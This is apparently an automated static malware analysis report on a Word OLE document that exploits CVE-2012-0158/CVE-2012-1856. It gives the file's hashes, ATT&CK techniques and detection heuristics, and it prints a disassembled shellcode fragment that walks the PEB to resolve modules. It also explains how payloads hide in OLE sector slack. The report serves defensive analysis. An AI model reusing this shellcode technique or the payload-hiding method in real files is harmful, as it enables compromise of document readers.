Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 42db6dbe30c4466d…

MALICIOUS

Office (OLE)

Size: 114.5 KB
Created: 2006-09-28 17:06:00
Authoring application: Microsoft Office Word
First seen: 2015-09-19
MD5: 009aa88533f94b9032588ca4f05b81c0
SHA-1: d5dc45fd1c0cb0d5ebb157250118d436b636ca9e
SHA-256: 42db6dbe30c4466d9b32dd91f69bd1b09ccbfc9b0643a619c034acd728f89069
Risk score: 180

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment

The file is identified as malicious because it exploits CVE-2012-0158 / CVE-2012-1856, a known vulnerability in MSCOMCTL.Toolbar. This vulnerability allows arbitrary code execution when the document is opened. The large unaccounted-for slack region in the OLE structure and the PEB-access heuristic further support the malicious verdict.

Heuristics (4)

  • MSCOMCTL.Toolbar — CVE-2012-0158 / CVE-2012-1856 (severity: high) CVE likely CVE_2012_1856
  • ClamAV: Doc.Exploit.CVE_2012_0158-17 (severity: critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Exploit.CVE_2012_0158-17
  • PEB access via FS segment (x86) (severity: high) SC_PEB_ACCESS
    Disassembly (attempted x86 opcode disassembly):
    00003D46  648b1530000000    mov edx, dword ptr fs:[0x30]
    00003D4D  8b520c            mov edx, dword ptr [edx + 0xc]
    00003D50  8b521c            mov edx, dword ptr [edx + 0x1c]
    00003D53  8b5a08            mov ebx, dword ptr [edx + 8]
    00003D56  8b5a08            mov ebx, dword ptr [edx + 8]
    00003D59  8b4a20            mov ecx, dword ptr [edx + 0x20]
    00003D5C  8b12              mov edx, dword ptr [edx]
    00003D5E  81790c33003200    cmp dword ptr [ecx + 0xc], 0x320033
    00003D65  75ef              jne 0x3d56
    00003D67  6683791800        cmp word ptr [ecx + 0x18], 0
    00003D6C  75e8              jne 0x3d56
    00003D6E  8b7d08            mov edi, dword ptr [ebp + 8]
    00003D71  b90e000000        mov ecx, 0xe
    00003D76  e8a9010000        call 0x3f24
    00003D7B  c9                leave
    00003D7C  c20400            ret 4
    00003D7F  55                push ebp
    00003D80  8bec              mov ebp, esp
    00003D82  33ff              xor edi, edi
    00003D84  b980000000        mov ecx, 0x80
    00003D89  57                push edi
    00003D8A  e2fd              loop 0x3d89
    00003D8C  47                inc edi
    00003D8D  8d5df4            lea ebx, [ebp - 0xc]
    00003D90  53                push ebx
    00003D91  57                push edi
    00003D92  ff5630            call dword ptr [esi + 0x30]
    00003D95  83f8ff            cmp eax, -1
    00003D98  74f2              je 0x3d8c
    00003D9A  3d00200000        cmp eax, 0x2000
    00003D9F  76eb              jbe 0x3d8c
    00003DA1  8945fc            mov dword ptr [ebp - 4], eax
    00003DA4  89                .byte 0x89
    00003DA5  7d                .byte 0x7d
  • OLE document has large unaccounted-for region (severity: high) OLE_SLACK_ANOMALY
    OLE file is 117,264 bytes but its declared streams total only 16,640 bytes — 100,624 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).